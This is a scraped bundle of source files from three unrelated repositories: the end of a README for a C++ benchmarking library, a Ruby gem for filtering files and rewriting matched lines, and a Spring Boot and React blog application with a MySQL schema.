The following will be used to explain the basic concepts of gauge. To try it out save the following code in a file called ``main.cpp``:: #include <gauge/gauge.hpp> #include <vector> BENCHMARK(MyTest, RunThis, 100) { std::vector<int> integers; for(int i = 0; i < 2048; ++i) { integers.push_back(i); } // This is where the clock runs RUN { for(uint i = 1; i < integers.size(); ++i) { integers[i] += integers[i-1]; } } } int main(int argc, const char* argv[]) { gauge::runner::add_default_printers(); gauge::runner::run_benchmarks(argc, argv); return 0; } In the above we use the ``BENCHMARK`` macro which takes 3 parameters: 1. The name of the test-case in this case ``MyTest`` 2. The name of the benchmark in this case ``RunThis`` 3. The number of runs to complete in this case 100. The measurement will not start until we hit the ``RUN`` macro. Depending on the type of benchmark (the default is time) the code inside ``RUN`` will be executed several times (we refer to this as the number of iterations). When gauge is satisfied with the measurement we exit the run loop. For every ``BENCHMARK`` we may only call ``RUN`` once. Using ``g++`` the example code may be compiled as:: g++ main.cpp -o benchmark --std=c++14 -I../path_to_gauge/ -L../path_to_libguage -lgauge -ltables You should now be able to run the benchmark using:: ./benchmark License ------- gauge is available under the BSD license, see the LICENSE.rst file. Credits ------- We have create gauge to fit our specific purpose, however we hope that others may also find it useful. When designing gauge we found inspiration in these other nice projects: * Qt's benchmark tools part of QTestLib_. * <NAME>'s Hayai_ C++ benchmark tool, who also provided the nice terminal colors. * The `Google Test`_ framework. .. _QTestLib: http://qt-project.org/doc/qt-4.8/qtestlib-tutorial5.html .. _Hayai: https://github.com/nickbruun/hayai .. _`Google Test`: http://code.google.com/p/googletest/ Thanks for all the fish.
f4e708ec06ac096c883f58fe3713a83cedcb6935
[ "C++", "reStructuredText" ]
2
C++
nestorjhernandezm/gauge
9c0556cc45d4f3d72aeec796320a4eb67ae62803
b632ad4360af28cd1c4fd172e9d43baad789b1c9
refs/heads/master
<file_sep>#!/usr/bin/env ruby -wKU # TODO: Output-Methoden für File- und Line-Collections, Tabellen, success & failure inkl. optionaler Colorierung. %w(collection core_ext latex version).each do |_module| require File.join(File.dirname(__FILE__), "sherlock", _module) end module Sherlock module InstanceMethods def collect_files_matching(*args) Sherlock::Collection::Files.new(*args) end alias investigate collect_files_matching end class << self def included(base) base.__send__(:include, InstanceMethods) end include InstanceMethods alias [] collect_files_matching end end<file_sep>#!/usr/bin/env ruby -wKU sub_dir = File.basename(__FILE__, '.rb') all_files = Dir[File.join(File.dirname(__FILE__), sub_dir, '*.rb')] all_files.sort.map { |f| File.basename(f, '.rb') }.each do |_module| require File.join(File.dirname(__FILE__), sub_dir, _module) end <file_sep>require File.expand_path(File.dirname(__FILE__) + '/../spec_helper') describe Sherlock::Collection::Files do def numbered_lines text_files(:only => /lines/).lines(/^.*(\d+\.)(.+)/) end describe "#initialize" do it "creates an collection of lines looking like numbered lists" do lines = numbered_lines lines.should_not be_empty end end describe "#filter" do it "filters a collection of lines" do lines = numbered_lines new_lines = lines.filter(:except => /^\d\./) lines.count.should be > new_lines.count end end describe "#gsub" do it "modifies a collection of lines" do lines = numbered_lines new_lines = lines.gsub(/^(.*)(\d+)(\..+)/) do |match| "X #{match}" end new_lines.each do |line| line.changed?.should == true end end end end<file_sep>#!/usr/bin/env ruby -wKU # this is still very experimental # # I want to be able to perform large LaTeX document analysis in an easy readable way # e.g. # Sherlock[:tex].inputs(:except => 'generated') # # => all lines with input directives, except the ones containing 'generated' # Sherlock[:tex].macros(:emph) # # => all lines containing the \emph{} macro # # Maybe even environments could be analysed (e.g. figure and tabular) # module Sherlock module LaTex #:nodoc: class << self def included(base) base.__send__(:include, InstanceMethods) Sherlock::Collection::Files.__send__(:include, Collection::Files::InstanceMethods) end end module InstanceMethods def tex_files(opts = {}) investigate('**/*.tex', opts) end end module Collection module Files module InstanceMethods def collect_macros(pattern) collect(/\\(#{pattern})(\{([^\}]+)\})*/) end alias macros collect_macros def inputs(opts = {}) macros(:input).filter(opts) end def tagged(with_tag) tag_prefix = "%%!!" arr = [with_tag].flatten.map { |tag| "#{tag_prefix} #{tag}" } containing(arr) end def not_tagged(with_tag) tag_prefix = "%%!!" arr = [with_tag].flatten.map { |tag| "#{tag_prefix} #{tag}" } not_containing(arr) end end end end end end<file_sep>#!/usr/bin/env ruby -wKU module Sherlock module Collection class Base < Array def initialize(arr = [], opts = {}) super(0) self.concat filter_array_by_options(arr, opts) end # Returns the first value of the collection (matching the value, if given). def first(*value) item = if value.empty? super else filter(value)[0] end new([item]) end # Returns a collection with all files matching the # given pattern. def select_items_matching(*pattern) opts = pattern.last.is_a?(Hash) ? pattern.pop : {} pattern = [pattern].flatten arr = select { |f| pattern.empty? || matching?(f, pattern) } arr = filter_array_by_options(arr, opts) new(arr, opts) end alias filter select_items_matching # Filters the collection, if the first argument is an Array, Regexp, String or Hash. def [](value, *args) case value when String, Regexp, Array, Hash filter(value, *args) else super(value) end end def -(other) new(super) end def +(other) new(super.uniq) end def &(other) new(super) end def |(other) new(super) end private def filter_array_by_options(arr, opts = {}) arr = arr.select { |f| matching?(f, opts[:only]) } if opts[:only] arr = arr.reject { |f| matching?(f, opts[:except]) } if opts[:except] arr end def matching?(obj, string_or_regexp_or_array) [string_or_regexp_or_array].flatten.detect { |pattern| obj.match(pattern) } end def new(*args) self.class.new(*args) end end end end <file_sep>require File.expand_path(File.dirname(__FILE__) + '/../spec_helper') describe Sherlock::Collection::Files do def some_line lines = text_files.lines('Zeile') lines[0] end describe "#initialize" do it "should be an unchanged line" do some_line.changed?.should == false end end describe "#gsub" do it "modifies a line" do line = some_line new_line = line.gsub(/^(.*)/, 'X \1') new_line[0..0].should == 'X' new_line.changed?.should == true line[0..0].should_not == 'X' line.changed?.should == false end end end <file_sep># encoding: utf-8 require File.expand_path(File.dirname(__FILE__) + '/../spec_helper') describe Sherlock::Collection::Base do def new_collection(arr = nil, opts = {}) arr ||= %w(eins zwei drei vier fünf) Sherlock::Collection::Base.new(arr, opts) end def filter_arguments [ [['ei']], [[/ei/]], [['sieben', 'sechs', 'fünf', 'vier']], [[/ei/, 'fünf'], {:only => /ei$/, :except => 'zwei'}], [{:only => /ei$/, :except => 'zwei'}], ] end describe "#initialize" do it "creates an empty collection without arguments" do empty_collection = Sherlock::Collection::Base.new empty_collection.should be_empty end it "creates a full collection for a given array" do collection = new_collection([:foo, :bar]) collection.should_not be_empty end it "creates a full collection for a given collection" do collection = new_collection(new_collection) collection.should_not be_empty end end describe "#first" do it "should give a collection with the first matching element for a string" do collection = new_collection.first('ei') collection.should == new_collection(%w(eins)) end it "should give a collection with the first matching element for a regexp" do collection = new_collection.first(/ei/) collection.should == new_collection(%w(eins)) end it "should give a collection with the first matching element for an array of strings" do collection = new_collection.first(%w(sieben sechs fünf)) collection.should == new_collection(%w(fünf)) end it "should give a collection with the first matching element for an array of regexps" do collection = new_collection.first([/sieben/, /sechs/, /fünf/]) collection.should == new_collection(%w(fünf)) end it "should give a collection with the first matching element for an array of strings and regexps" do collection = new_collection.first([/sieben/, /sechs/, 'fünf']) collection.should == new_collection(%w(fünf)) end end describe "#filter" do # without real arguments it "should give the same collection without arguments" do collection = new_collection.filter collection.should == new_collection end it "should give the same collection with empty arguments" do collection = new_collection.filter([], {}) collection.should == new_collection end # without options it "should give a collection with the matching elements for a string" do collection = new_collection.filter('ei') collection.should == new_collection(%w(eins zwei drei)) end it "should give a collection with the matching elements for a regexp" do collection = new_collection.filter(/ei/) collection.should == new_collection(%w(eins zwei drei)) end it "should give a collection with the matching elements for an array of strings" do collection = new_collection.filter(%w(sieben sechs fünf vier)) collection.should == new_collection(%w(vier fünf)) end it "should give a collection with the matching elements for an array of regexps" do collection = new_collection.filter([/ei/, /sechs/, /fünf/]) collection.should == new_collection(%w(eins zwei drei fünf)) end it "should give a collection with the matching elements for an array of strings and regexps" do collection = new_collection.filter([/ei/, 'fünf']) collection.should == new_collection(%w(eins zwei drei fünf)) end # with options it "should accept options as only argument" do collection = new_collection.filter(:except => 'zwei') collection.should == new_collection(%w(eins drei vier fünf)) end it "should accept options as only argument (chained)" do collection = new_collection.filter([/ei/, 'fünf']).filter(:except => 'zwei') collection.should == new_collection(%w(eins drei fünf)) end it "should filter results with :except option" do collection = new_collection.filter([/ei/, 'fünf'], :except => 'zwei') collection.should == new_collection(%w(eins drei fünf)) end it "should filter results with :only option" do collection = new_collection.filter([/ei/, 'fünf'], :only => /ei$/) collection.should == new_collection(%w(zwei drei)) end it "should filter results with :only option first and :except option afterwards" do collection = new_collection.filter([/ei/, 'fünf'], :only => /ei$/, :except => 'zwei') collection.should == new_collection(%w(drei)) end end describe "#[]" do it "should be a shortcut for 'filter'" do filter_arguments.each do |args| new_collection[*args].should == new_collection.filter(*args) end end end describe "#+" do it "should combine two collections" do collection1 = new_collection(nil, :only => 'eins') collection2 = new_collection(nil, :only => 'zwei') result = collection1 + collection2 result.should == new_collection(%w(eins zwei)) end end describe "#-" do it "should reduce two collections" do collection1 = new_collection(nil, :only => /ei/) collection2 = new_collection(nil, :only => 'zwei') result = collection1 - collection2 result.should == new_collection(%w(eins drei)) end end # TODO: tests for #& und #| end<file_sep>#!/usr/bin/env ruby -wKU module Sherlock module Collection class Lines < Base # Executes gsub on all lines in the collection and returns # the modified collection. def gsub(*args, &block) arr = map { |line| line.gsub(*args, &block) } new(arr) end # Returns an array of the lines' match_data objects without the # 'overall' match (the first element of the MatchData object). def matches map { |line| line.match_data[1..line.match_data.length-1] } end def new(arr, opts = {}) # :nodoc: self.class.new(arr) end def save! sort_by { |line| line.line_number }.reverse.each(&:save!) end def to_s map { |line| (line.changed? ? '[C] ' : '[ ] ') + line.inspect }.join("\n") end alias inspect to_s end end end<file_sep>#!/usr/bin/env ruby -wKU $:.unshift(File.join(File.dirname(__FILE__), "..", "lib")) require 'sherlock' require 'rubygems' require 'rspec' require 'fileutils' def text_files(opts = {}) Sherlock::Collection::Files.new('**/*.txt', opts) end def rebuild_test_data_dir! FileUtils.rm_rf(test_data_dir) FileUtils.mkdir_p(test_data_dir) FileUtils.cp_r(original_test_data_dir, tmp_dir) end def original_test_data_dir File.join(File.dirname(__FILE__), 'fixtures') end def test_data_dir File.join(tmp_dir, 'fixtures') end def tmp_dir File.join(File.dirname(__FILE__), '..', 'tmp') end RSpec.configure do |config| config.before(:each) { rebuild_test_data_dir! Dir.chdir(test_data_dir) } end<file_sep> class ::Object #:call-seq: # obj.full? # obj.full? { |f| ... } # # Returns wheter or not the given obj is not blank?. # If a block is given and the obj is full?, the obj is yielded to that block. # # salary = nil # salary.full? # => nil # salary.full? { |s| "#{s} $" } # => nil # salary = 100 # salary.full? { |s| "#{s} $" } # => "100 $" # # With ActiveSupport's implementation of Symbol#to_proc it is possible to write: # # current_user.full?(&:name) # => "Dave" def full? f = blank? ? nil : self if block_given? and f yield f else f end end end class ::Symbol # Turns the symbol into a simple proc, which is especially useful for enumerations. Examples: # # # The same as people.collect { |p| p.name } # people.collect(&:name) # # # The same as people.select { |p| p.manager? }.collect { |p| p.salary } # people.select(&:manager?).collect(&:salary) # # (borrowed from ActiveSupport) def to_proc Proc.new { |*args| args.shift.__send__(self, *args) } end unless method_defined?(:to_proc) end <file_sep>$:.unshift('lib') require 'sherlock/version' Gem::Specification.new do |s| s.author = "<NAME>" s.email = '<EMAIL>' s.homepage = "http://github.com/rrrene/sherlock" s.name = 'sherlock' s.version = Sherlock::VERSION::STRING.dup s.platform = Gem::Platform::RUBY s.summary = "A library for filtering lists of files and performing actions on their content." s.description = "A library for filtering lists of files and performing actions on their content." s.files = Dir[ 'lib/**/*', 'spec/**/*'] s.require_path = 'lib' s.requirements << 'none' s.add_development_dependency 'rake' s.add_development_dependency 'rspec' end<file_sep>#!/usr/bin/env ruby -wKU module Sherlock module Collection # ==== Attributes # # * <tt>:file</tt> # * <tt>:line_number</tt> # * <tt>:pattern</tt> # class MatchedLine < String attr_accessor :attributes def initialize(line, _attributes = {}) super(line) self.attributes = {:original => line}.merge(_attributes) end def changed? attributes[:original] != self end def gsub(*args, &block) self.class.new(super, attributes) end def match_data attributes[:pattern].each do |p| if m = self.match(p) return m end end nil end def method_missing(m) if attributes && value = attributes[m.to_s.intern] value else super end end def save! all_lines = File.open(file, 'r') { |f| f.readlines } index = line_number - 1 if original == all_lines[index] all_lines[index] = self.to_s else raise "File seems modified: #{file}" end File.open(file, 'w') {|f| f.write(all_lines) } end end end end<file_sep>#!/usr/bin/env ruby -wKU module Sherlock module Collection class Files < Base def initialize(glob_or_regex, opts = {}) case glob_or_regex when Hash opts = glob_or_regex when Array opts[:arr] = glob_or_regex when String opts[:glob] = glob_or_regex when Symbol opts[:glob] = "**/*.#{glob_or_regex}" when Regexp if opts[:only] raise "Cannot use regexp and :only-option at the same time." else opts[:only] = glob_or_regex end end opts = {:glob => '**/*'}.merge(opts) arr = opts[:arr] || Dir[opts[:glob]] super(arr, opts) end # Returns a Lines collection with all lines containing the # given content / matching the given pattern. def collect_lines_matching(pattern = //, &block) pattern = [pattern].flatten lines = Lines.new self.each { |f| io = File.open(f) io.each { |line| if matching?(line, pattern) lines << MatchedLine.new(line, :file => f, :line_number => io.lineno, :pattern => pattern) end } } lines end alias lines collect_lines_matching def not_blank_lines lines(/\S+/) end def blank_lines lines(/^\s+$/) end # Returns a Files collection with all files containing the # given content / matching the given pattern. def select_files_containing(pattern) select_files(pattern, :select) end alias containing select_files_containing # Returns a Files collection with all files not containing the # given content / matching the given pattern. def select_files_not_containing(pattern) select_files(pattern, :reject) end alias not_containing select_files_not_containing private def select_files(pattern, method) pattern = [pattern].flatten arr = send(method) { |f| matching?(File.read(f), pattern) } new(arr) end end end end <file_sep>require File.expand_path(File.dirname(__FILE__) + '/../spec_helper') describe Sherlock::Collection::Files do def filtered_by_initialize(filter = {:only => /lines/}) text_files(filter) end describe "#initialize" do it "creates an collection of all text files" do files = text_files files.should_not be_empty end it "filters text files by name" do filtered_by_method = text_files.filter(:only => /lines/) filtered_by_initialize.should == filtered_by_method end it "should accept a glob (String) as first argument" do Sherlock['**/*.txt'].should == Dir['**/*.txt'] end it "should accept a Symbol as first argument" do files = Sherlock[:txt] files.should == Sherlock["**/*.txt"] end it "should accept a Regexp as first argument" do Sherlock[/\.txt$/].should == Sherlock['**/*.txt'] end end describe "#lines" do it "collects all lines beginning with a number and a dot." do lines = text_files(:only => /lines/).lines(/^\d+\./) lines.should_not be_empty end it "tries to collect all lines beginning with a number and a dot." do lines = text_files(:except => /lines/).lines(/^\d+\./) lines.should be_empty end end describe "#select_files_containing" do it "selects all text files containing numbered lists" do files = text_files.containing(/^.*\d+\./) files.should_not be_empty files.should == text_files(:only => 'lines.txt') end end describe "#select_files_not_containing" do it "selects all text files not containing numbered lists" do files = text_files.not_containing(/^.*\d+\./) files.should_not be_empty files.should == text_files(:except => 'lines.txt') end end end<file_sep># Sherlock ## Description Sherlock provides an easy way to filter collections of files and report/modify/save specific lines using ruby. ## Installation $ gem install sherlock ## Usage The Sherlock brackets accessor takes a glob as first argument, just like Dir: # Select all tex files Dir['**/*.tex'] Sherlock['**/*.tex'] And you can filter this collection, just like with Dir: # Select all tex files beginning with 'chapter' except chapter 0 Dir['**/*.tex'].select { |f| f =~ /chapter_/ }.reject { |f| f == 'chapter_0' } Sherlock['**/*.tex', {:only => /chapter_/, :except => 'chapter_0'}] But you can also easily filter file collections by their content and report/modify/save specific lines of text. # Select all ruby files, comment all lines using 'puts' (except those lines that are already commented) and save the changes. Sherlock['**/*.rb'].lines(/puts/).filter(:except => /^#/).gsub(/.+/) { |line| "# #{line}" }.save! ## Collecting files To filter this set of files further, use the options parameter: Sherlock['**/*.tex', {:only => /^\d+/, :except => /table_of_contents/}) or you can use the filter method: Sherlock['**/*.tex'].filter(:only => /^\d+/, :except => /table_of_contents/) The fitler method also takes a String, Regexp or Array as parameter (which is then interpreted as :only option): app = Sherlock['app/**/*.rb'] models = app.filter(/models/) views = app.filter(/views/) controllers = app.filter(/controllers/) which is aliased as []: app = Sherlock['app/**/*.rb'] models = app[/models/] views = app[/views/] controllers = app[/controllers/] The containing and not_containing methods can be used to filter file collections based on their content: Sherlock['app/**/*.rb'].containing('TODO:') ## Collecting lines Like the namesake of this module, we often want to dig deeper and investigate further: Sherlock['**/*.tex'] # => Sherlock::Collection::Files Sherlock['**/*.tex'].lines(/% TODO:(.+)/) # => Sherlock::Collection::Lines This returns a collection of lines that matched the given argument. To get the matched part of the line, you can use the matches method: Sherlock['**/*.tex'].lines(/% TODO:(.+)/).matches # => [['improve headline'], ['write conclusion'], ['get an A']] ## Modifying lines Finally, you want to be able to not only use your findings, but change the content of the collected lines. You can using the gsub and save! method: Sherlock['**/*.tex'].lines(/% URGENT:/).gsub('URGENT', 'TODO').save! gsub and save! work both on collections of lines as well as individual line objects! ## Filtering in general All filtering methods, such as filter, first, containing and not_containing, accept the :only and :except options (or a single argument which is interpreted as :only option). files = Sherlock['**/*.rb'] files.filter(:only => 'controllers') == files.filter('controllers') files.filter(/(models|controllers)/) == files.filter(%w{models controllers}) Values provided to these options can be a Regexp, a String or an Array of Regexps/Strings. ## License Released under the MIT License. See the LICENSE file for further details. <file_sep>require File.expand_path(File.dirname(__FILE__) + '/spec_helper') describe Sherlock do describe "#investigate" do it "creates a collection of all text files" do files = Sherlock.investigate('**/*.txt') files.should_not be_empty end it "creates an empty collection" do files = Sherlock.investigate('**/not-there') files.should be_empty end end end<file_sep>#!/usr/bin/env ruby -wKU require File.join(File.dirname(__FILE__), 'lib', 'sherlock') include Sherlock include Sherlock::LaTex require 'irb' require 'irb/completion' IRB.start
8e85d1d863a8c6b8b70c961cd57a829bf37a6c08
[ "Markdown", "Ruby" ]
17
Ruby
rrrene/sherlock
607950dfaef32d6ce04f369b54e7b4bb00143053
8a775d507dc494c30781079003656c616e4bd7cd
refs/heads/master
<repo_name>zwbsdmpy/springboot_blogs<file_sep>/blogs/src/redux/actionCreater.js import * as actionType from './actionType.js' import axios from "axios"; export const login = (data) => { return (dispatch) => { axios.post('/users/login', data).then( (res) => { if (res.status === 200) { console.log("userdata:" + JSON.stringify(res)); const userData = res.data; dispatch({ type: actionType.USER_DATA, userData, }) } } ).catch( () => { alert("登录失败!") } ) } }; <file_sep>/src/test/java/com/springboot_blog/log/LoggerTest.java /** * FileName: LoggerTest * Author: zwbsdmpy * Date: 2020/1/27 22:41 * Description: * History: */ package com.springboot_blog.log; import org.junit.Test; import org.junit.runner.RunWith; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import org.springframework.boot.test.context.SpringBootTest; import org.springframework.test.context.junit4.SpringRunner; /** * 〈〉 * * @author zwb * @create 2020/1/27 * @since 1.0.0 */ @RunWith(SpringRunner.class) @SpringBootTest public class LoggerTest { private Logger logger = LoggerFactory.getLogger(LoggerTest.class); @Test public void testLog() { logger.trace("这是 info 级别"); logger.debug("这是 debug 级别"); logger.info("这是 info 级别"); logger.warn("这是 warn 级别"); logger.error("这是 error 级别"); } } <file_sep>/blogs/src/redux/actionType.js /** * action type名称常量 */ export const LOGIN = 'login'; export const USER_DATA = 'userData'; <file_sep>/blogs/src/container/Login.jsx import {connect} from "react-redux"; import LoginView from "../component/login/LoginView"; import * as action from "../redux/actionCreater"; const mapStateToProps = (state) => { return { userData: state.mainView.userData } } const mapDispatchToProps = (dispatch) => { return { login: (user) => dispatch(action.login(user)) } } export default connect(mapStateToProps, mapDispatchToProps)(LoginView) <file_sep>/src/main/java/com/util/JsonUtil.java package com.util; import com.fasterxml.jackson.core.JsonProcessingException; import com.fasterxml.jackson.databind.ObjectMapper; /** * Json工具类 * * @author zwbsdmpy */ public class JsonUtil { private JsonUtil () { } public static String obj2String (Object object) { if (object == null) { return null; } if (object instanceof String) { return object.toString (); } ObjectMapper mapper = new ObjectMapper (); try { return mapper.writeValueAsString (object); } catch (JsonProcessingException e) { e.printStackTrace (); } return ""; } } <file_sep>/blogs/src/component/login/LoginView.jsx import React, {Component} from "react"; import "./style.css"; import 'bootstrap/dist/css/bootstrap.css' import {Link} from "react-router-dom"; export default class LoginView extends Component { state = { userData: {}, account: "", password: "", Logging: false, isLogin: false, }; componentDidMount() { } componentWillReceiveProps(nextProps) { this.setState({userData: nextProps.userData}); } handleNameChange = (event) => { const account = event.target.value; this.setState({account}); }; handlePasswordChange = (event) => { const password = event.target.value; this.setState({password}); }; handleSubmit = (event) => { event.preventDefault(); const user = {"account": this.state.account, "password": <PASSWORD>}; this.props.login(user); if (this.state.userData !== {}) { const isLogin = true; this.setState({isLogin}); } }; render() { const {userData, isLogin, Logging} = this.state; let view = ''; if (!isLogin) { view = <div className=".container-fluid"> <div className="text-center align-items-center"> <div className="logo text-uppercase"> <span>SKIN.</span> <strong className="text-primary">BLOG</strong> </div> {/*<div className="text-center">*/} {/* 人类的悲欢并不相通*/} {/* 我只觉得他们吵闹*/} {/*</div>*/} <form className="text-center"> <div className="form-group-material"> <label htmlFor="userAccount" className="label-material">账号&nbsp;</label> <input id="userAccount" type="text" name="userAccount" required data-msg="请输入用户名" className="input-material" onChange={this.handleNameChange}/> </div> <div className="form-group-material"> <label htmlFor="password" className="label-material">密码&nbsp;</label> <input id="password" type="<PASSWORD>" name="loginPassword" required data-msg="请输入密码" className="input-material" onChange={this.handlePasswordChange}/> </div> <div className="form-group text-center"> <input type="submit" id="login" className="btn btn-primary" value="登录" onClick={this.handleSubmit}/> </div> </form> 忘记密码? < small> 没有账号? </small>注册 </div> </div> } else if (!Logging) { view = <div> LOADING...</div> } if (userData !== {} && isLogin) { view = <Link to='/Manager'/> } return ( view ) } } <file_sep>/src/main/java/com/model/UserResource.java package com.model; import com.domain.Article; import com.domain.Menu; import com.domain.User; import com.util.JsonUtil; import lombok.Data; import java.util.ArrayList; import java.util.List; /** * 用户资源 * * @author zwbsdmpy */ @Data public class UserResource { private User user; private Menu menu = new Menu (); private List<Article> articles = new ArrayList<> (); @Override public String toString () { return JsonUtil.obj2String (this); } } <file_sep>/src/main/java/com/domain/Article.java package com.domain; import lombok.Data; /** * @author zwbsdmpy */ @Data public class Article { private int articleId; private int userId; private String articleTitle; private String content; private int scanCount; private int likesCount; private int replyCount; } <file_sep>/blogs/src/AppRouter.js import {BrowserRouter, Route} from "react-router-dom"; import React from "react"; import Manager from "./container/Manager"; import Login from "./container/Login"; import IndexView from "./component/index/IndexView"; export default class AppRouter extends React.Component { render() { return ( <BrowserRouter> <Route path="/" exact component={IndexView}/> <Route path="/login" exact component= {Login}/> <Route path="/manager" exact component={Manager}/> </BrowserRouter> ) } } <file_sep>/blogs/src/component/common/CommonFooter.jsx import {Layout} from "antd"; import React from "react"; const {Footer} = Layout; export class CommonFooter extends React.Component { render() { return ( <Footer style={{textAlign: 'center'}}>zwbsdmpy Design ©2020 Created</Footer> ) } } <file_sep>/src/main/java/com/domain/Replay.java package com.domain; import lombok.Data; @Data public class Replay { private int replayId; private int articleId; private String content; private int owner; } <file_sep>/blogs/src/App.jsx import React from 'react'; import {Provider} from "react-redux"; import {store} from "./redux/store"; import AppRouter from "./AppRouter"; // 总入口 export default class App extends React.Component { render() { return ( <Provider store={store}> <AppRouter/> </Provider> ) } } <file_sep>/src/main/java/com/util/UriUtil.java package com.util; public class UriUtil { public static void parseUri(String uri){ } } <file_sep>/blogs/src/component/common/CommonHeader.jsx import React, {Component} from 'react'; import {Badge, Col, Menu, Row} from 'antd'; import MailOutlined from "@ant-design/icons/lib/icons/MailOutlined"; import AppstoreOutlined from "@ant-design/icons/lib/icons/AppstoreOutlined"; import SettingOutlined from "@ant-design/icons/lib/icons/SettingOutlined"; import {Avatar} from 'antd'; import {UserOutlined} from '@ant-design/icons'; import {Link} from "react-router-dom"; const {SubMenu} = Menu; export class CommonHeader extends Component { state = { current: 'mail', }; handleClick = e => { console.log('click ', e); this.setState({ current: e.key, }); }; render() { return ( <div className='header'> <Row> <Col span={18}> <Menu onClick={this.handleClick} selectedKeys={[this.state.current]} mode="horizontal"> <Menu.Item key="mail" icon={<MailOutlined/>}> Navigation One </Menu.Item> <Menu.Item key="app" icon={<AppstoreOutlined/>}> Navigation Two </Menu.Item> <SubMenu icon={<SettingOutlined/>} title="Navigation Three - Submenu"> <Menu.ItemGroup title="Item 1"> <Menu.Item key="setting:1">Option 1</Menu.Item> <Menu.Item key="setting:2">Option 2</Menu.Item> </Menu.ItemGroup> <Menu.ItemGroup title="Item 2"> <Menu.Item key="setting:3">Option 3</Menu.Item> <Menu.Item key="setting:4">Option 4</Menu.Item> </Menu.ItemGroup> </SubMenu> <Menu.Item key="alipay"> <a href="https://ant.design" target="_blank" rel="noopener noreferrer"> Navigation Four - Link </a> </Menu.Item> </Menu> </Col> <Col span={6}> <Col span={6}> <span className="avatar-item"> <Avatar shape="square" size='large' icon={<UserOutlined/>}/> </span> </Col> <Col span={6}> <h4><Link to='/login'>登录</Link>/注册</h4> </Col> </Col> </Row> </div> ) } } <file_sep>/src/main/resources/blogs.sql /* Navicat Premium Data Transfer Source Server : root Source Server Type : MySQL Source Server Version : 50727 Source Host : localhost:3306 Source Schema : blogs Target Server Type : MySQL Target Server Version : 50727 File Encoding : 65001 Date: 10/08/2020 23:35:40 */ SET NAMES utf8mb4; SET FOREIGN_KEY_CHECKS = 0; -- ---------------------------- -- Table structure for article -- ---------------------------- DROP TABLE IF EXISTS `article`; CREATE TABLE `article` ( `article_id` int(11) NOT NULL, `user_id` int(11) DEFAULT NULL, `article_title` varchar(30) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL, `content` longtext CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL, `scan_count` int(16) DEFAULT NULL, `likes_count` int(16) DEFAULT NULL, `reply_count` int(16) DEFAULT NULL, PRIMARY KEY (`article_id`) USING BTREE ) ENGINE = InnoDB CHARACTER SET = utf8 COLLATE = utf8_general_ci ROW_FORMAT = Dynamic; -- ---------------------------- -- Records of article -- ---------------------------- INSERT INTO `article` VALUES (10000, 10000, 'zwbsdmpy', '123456', 0, 0, 0); -- ---------------------------- -- Table structure for menu -- ---------------------------- DROP TABLE IF EXISTS `menu`; CREATE TABLE `menu` ( `menu_id` int(11) UNSIGNED NOT NULL AUTO_INCREMENT, `user_id` int(11) NOT NULL, `menu_type` varchar(255) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL, `menu_data` varchar(255) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL, PRIMARY KEY (`menu_id`) USING BTREE ) ENGINE = InnoDB AUTO_INCREMENT = 10001 CHARACTER SET = utf8 COLLATE = utf8_general_ci ROW_FORMAT = Dynamic; -- ---------------------------- -- Records of menu -- ---------------------------- INSERT INTO `menu` VALUES (10000, 10000, '1', '手动阀设法使'); -- ---------------------------- -- Table structure for replay -- ---------------------------- DROP TABLE IF EXISTS `replay`; CREATE TABLE `replay` ( `replay_id` int(11) NOT NULL, `article_id` int(11) NOT NULL, `content` varchar(255) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL, `user_id` int(11) DEFAULT NULL, PRIMARY KEY (`replay_id`) USING BTREE ) ENGINE = InnoDB CHARACTER SET = utf8 COLLATE = utf8_general_ci ROW_FORMAT = Dynamic; -- ---------------------------- -- Table structure for role -- ---------------------------- DROP TABLE IF EXISTS `role`; CREATE TABLE `role` ( `role_id` int(11) NOT NULL COMMENT '唯一标识', `role` varchar(0) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL COMMENT '角色', PRIMARY KEY (`role_id`) USING BTREE ) ENGINE = InnoDB CHARACTER SET = utf8 COLLATE = utf8_general_ci ROW_FORMAT = Dynamic; -- ---------------------------- -- Table structure for user -- ---------------------------- DROP TABLE IF EXISTS `user`; CREATE TABLE `user` ( `user_id` int(11) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT '用户自增id,起始为10000', `user_account` varchar(11) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL COMMENT '用户账号(唯一标识)7-11位', `password` varchar(15) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL COMMENT '用户密码,7-15位', `user_email` varchar(30) CHARACTER SET utf8 COLLATE utf8_bin DEFAULT NULL COMMENT '用户邮箱', `user_name` varchar(10) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL COMMENT '用户名', `user_avatar` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin DEFAULT NULL COMMENT '头像', `create_time` datetime(0) DEFAULT NULL COMMENT '创建日期(初始化就是创建时间)', `update_time` datetime(0) DEFAULT NULL ON UPDATE CURRENT_TIMESTAMP(0) COMMENT '最后一次修改日期', `last_login_time` datetime(0) DEFAULT NULL ON UPDATE CURRENT_TIMESTAMP(0) COMMENT '最后一次登录日期', `status` int(2) UNSIGNED NOT NULL DEFAULT 0 COMMENT '用户状态(0为正常)', `birthday` date DEFAULT NULL COMMENT '出生日期', `telephone` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin DEFAULT NULL COMMENT '用户电话', `role_id` int(11) UNSIGNED ZEROFILL DEFAULT NULL COMMENT '权限', PRIMARY KEY (`user_id`) USING BTREE ) ENGINE = InnoDB AUTO_INCREMENT = 10002 CHARACTER SET = utf8 COLLATE = utf8_bin ROW_FORMAT = Dynamic; -- ---------------------------- -- Records of user -- ---------------------------- INSERT INTO `user` VALUES (10000, 'zwbsdmpy', 'zwbsdmpy', '', '', '', NULL, NULL, NULL, 0, NULL, '', 00000000000); SET FOREIGN_KEY_CHECKS = 1; <file_sep>/blogs/src/component/login/Form.jsx import React, {Component} from "react"; export default class LoginForm extends Component { state = { username: "", password: "" }; handleNameChange = (event) => { console.log("handleNameChange"); const userName = event.target.value; this.setState({userName}); }; handlePasswordChange = (event) => { console.log("handleContentChange"); const password = event.target.value; this.setState({password}); }; handleSubmit = (event) => { }; render() { return ( <div> <form className="text-left form-validate"> <div className="form-group-material"> <input id="userAccount" type="text" name="userAccount" required 